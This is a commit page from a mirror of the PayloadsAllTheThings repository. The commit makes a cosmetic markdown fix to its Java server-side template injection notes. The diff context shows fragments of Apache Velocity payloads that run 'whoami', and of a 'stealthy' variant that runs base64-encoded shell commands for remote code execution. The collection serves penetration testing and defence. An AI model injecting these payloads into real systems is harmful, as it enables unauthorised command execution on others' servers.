Backup_Repos/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings synced 2025-12-06 08:54:40 +01:00
Code Issues Projects Releases Wiki Activity

fix(markdown): add blank lines around fenced code blocks to satisfy MD031

Browse source
This commit is contained in:
n3rada 2025-08-13 18:29:00 +00:00 committed by GitHub
parent d04a38a67c
commit f3cdd4ff0c
No known key found for this signature in database
GPG key ID: B5690EEEBB952194
1 changed files with 3 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

3
Server Side Template Injection/Java.md
View file

@ -214,6 +214,7 @@ New version of Pebble :
> Apache Velocity is a Java-based template engine that allows web designers to embed Java code references directly within templates. > Apache Velocity is a Java-based template engine that allows web designers to embed Java code references directly within templates.
In a vulnerable environment, Velocity's expression language can be abused to achieve remote code execution (RCE). For example, this payload executes the whoami command and prints the result: In a vulnerable environment, Velocity's expression language can be abused to achieve remote code execution (RCE). For example, this payload executes the whoami command and prints the result:
```java ```java
#set($str=$class.inspect("java.lang.String").type) #set($str=$class.inspect("java.lang.String").type)
#set($chr=$class.inspect("java.lang.Character").type) #set($chr=$class.inspect("java.lang.Character").type)
@ -226,6 +227,7 @@ $str.valueOf($chr.toChars($out.read()))
``` ```
A more flexible and stealthy payload that supports base64-encoded commands, allowing execution of arbitrary shell commands such as `echo "a" > /tmp/a`. Below is an example with `whoami` in base64: A more flexible and stealthy payload that supports base64-encoded commands, allowing execution of arbitrary shell commands such as `echo "a" > /tmp/a`. Below is an example with `whoami` in base64:
```java ```java
#set($base64EncodedCommand = 'd2hvYW1p') #set($base64EncodedCommand = 'd2hvYW1p')
@ -256,6 +258,7 @@ A more flexible and stealthy payload that supports base64-encoded commands, allo
$output.replaceAll("\\s+$", "").replaceAll("^\\s+", "") $output.replaceAll("\\s+$", "").replaceAll("^\\s+", "")
#end #end
``` ```
--- ---
## Groovy ## Groovy